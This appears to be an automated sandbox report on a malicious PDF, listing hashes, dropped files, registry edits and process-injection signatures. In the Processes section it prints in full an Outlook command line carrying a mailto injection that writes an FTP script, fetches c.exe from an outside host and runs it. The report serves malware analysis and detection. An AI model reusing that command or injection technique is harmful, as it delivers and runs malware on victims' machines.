Analysis
- Max time kernel: 120s
- Max time network: 120s
- Platform: windows7_x64
- Resource: win7-20231215-en
- Resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- Submitted: 12-02-2024 15:25
Behavioral tasks
- behavioral1
  Sample: 977c984367355f590a8bb159f76d94d9.pdf
  Resource: win7-20231215-en
- behavioral2
  Sample: 977c984367355f590a8bb159f76d94d9.pdf
  Resource: win10v2004-20231222-en
General
- Target: 977c984367355f590a8bb159f76d94d9.pdf
- Size: 14KB
- MD5: 977c984367355f590a8bb159f76d94d9
- SHA1: 1a1a1c77da9a62caae618745be5e2dac76afe56f
- SHA256: 25830eecbe144320cf5e74614e967b0f272a4362a801665258ad67c1255bb7d2
- SHA512: 2af47e7cf4b73ce007253206bf256d2c10d8969202fd04d9c7e83c06c0b4adecc7a4d926536c9b36b10d71eff1eca76ce414f2d0918039595bd4c76796c1b47b
- SSDEEP: 192:vJs0bjJqccyZxcqXtTJWuZ2yvO9Y+j1MK8kM7kMNzpFh4lMJ:R5pqwttTIs0pCfNTpr4qJ
Malware Config
Signatures
- Drops file in System32 directory (14 IoCs)
  Processes: OUTLOOK.EXE
  description | ioc | process
  File created | C:\Windows\system32\perfc00A.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfc00C.dat | OUTLOOK.EXE
  File created | C:\Windows\SysWOW64\PerfStringBackup.TMP | OUTLOOK.EXE
  File opened for modification | C:\Windows\SysWOW64\PerfStringBackup.INI | OUTLOOK.EXE
  File created | C:\Windows\system32\perfh009.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfc011.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfh011.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfc007.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfh007.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfh00A.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfc010.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfh010.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfc009.dat | OUTLOOK.EXE
  File created | C:\Windows\system32\perfh00C.dat | OUTLOOK.EXE
- Drops file in Windows directory (3 IoCs)
  Processes: OUTLOOK.EXE
  description | ioc | process
  File created | C:\Windows\inf\Outlook\0009\outlperf.ini | OUTLOOK.EXE
  File created | C:\Windows\inf\Outlook\outlperf.h | OUTLOOK.EXE
  File opened for modification | C:\Windows\inf\Outlook\outlperf.h | OUTLOOK.EXE
- Modifies Internet Explorer settings (9 IoCs)
  Processes: OUTLOOK.EXE
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt | OUTLOOK.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | OUTLOOK.EXE
  Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar | OUTLOOK.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | OUTLOOK.EXE
  Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | OUTLOOK.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | OUTLOOK.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | OUTLOOK.EXE
  Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | OUTLOOK.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | OUTLOOK.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: OUTLOOK.EXE
  pid | process
  2108 | OUTLOOK.EXE
- Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
  Processes: OUTLOOK.EXE, AcroRd32.exe
  pid | process
  2108 | OUTLOOK.EXE
  2956 | AcroRd32.exe
- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes: AcroRd32.exe
  pid | process
  2956 | AcroRd32.exe
  2956 | AcroRd32.exe
  2956 | AcroRd32.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes: AcroRd32.exe
  description | pid | process | target process
  PID 2956 wrote to memory of 2108 | 2956 | AcroRd32.exe | OUTLOOK.EXE
  (the same entry is recorded 9 times)
Processes
- [1] C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\977c984367355f590a8bb159f76d94d9.pdf"
  PID: 2956
  Signatures:
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - [2] C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE (child process)
    Command line: "C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE" -c IPM.Note /m "mailto:test%25../../../../../../../../windows/system32/cmd%22.exe%22%22%20/c%20/q%20%22@echo%20off&echo%20dinozavr_ftp0%3Ed&echo%20sDs1LSWZ%3E%3Ed&echo%20binary%3E%3Ed&echo%20GET%20/i%20c.exe%3E%3Ed&echo%20bye%3E%3Ed&ftp%20-is:d%20cgi18.hqhost.net%3Enul&del%20/q%20d&@start%20c.exe&%22%20%22&%22%20%22nul.bat%22.cmd"
    PID: 2108
    Signatures:
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 230KB
  MD5: 2592d0de4e35b4cb0091316d3654e491
  SHA1: 31a82f183f4a9668b49189c12ab50382f02c952a
  SHA256: e34318f3ccba08f03adeb8f7ec9d780340d4401d2f8e7ec4d4c81facad5495f1
  SHA512: c8b6f727fe538bca34204111205f2f579b3e55d5490e52ac5a0ed950ae740a178b27693bbd0e5a2ee3b172fdbe3ec1a5468f1e9de0a272dc75a3dc22a132a72e
- Filesize: 1KB
  MD5: 48dd6cae43ce26b992c35799fcd76898
  SHA1: 8e600544df0250da7d634599ce6ee50da11c0355
  SHA256: 7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a
  SHA512: c1b9322c900f5be0ad166ddcfec9146918fb2589a17607d61490fd816602123f3af310a3e6d98a37d16000d4acbbcd599236f03c3c7f9376aeba7a489b329f31
- Filesize: 3KB
  MD5: 9edff29076fc02b73344ab9c097e8843
  SHA1: 92ac67ab37a22cde2fe960a11d4f85c334139ea7
  SHA256: 08e08eb12cf799633f081ff6b9df8d6dc023448078afb0a6a80607b6d2bed43d
  SHA512: 0ccb3f99f31b3307653904e21e2ad82894433019fb52946d83217af2526d52c5048d484f81caf4cf860632adb5fa712cb3b4cda41da9ea0197d426db64c61bb9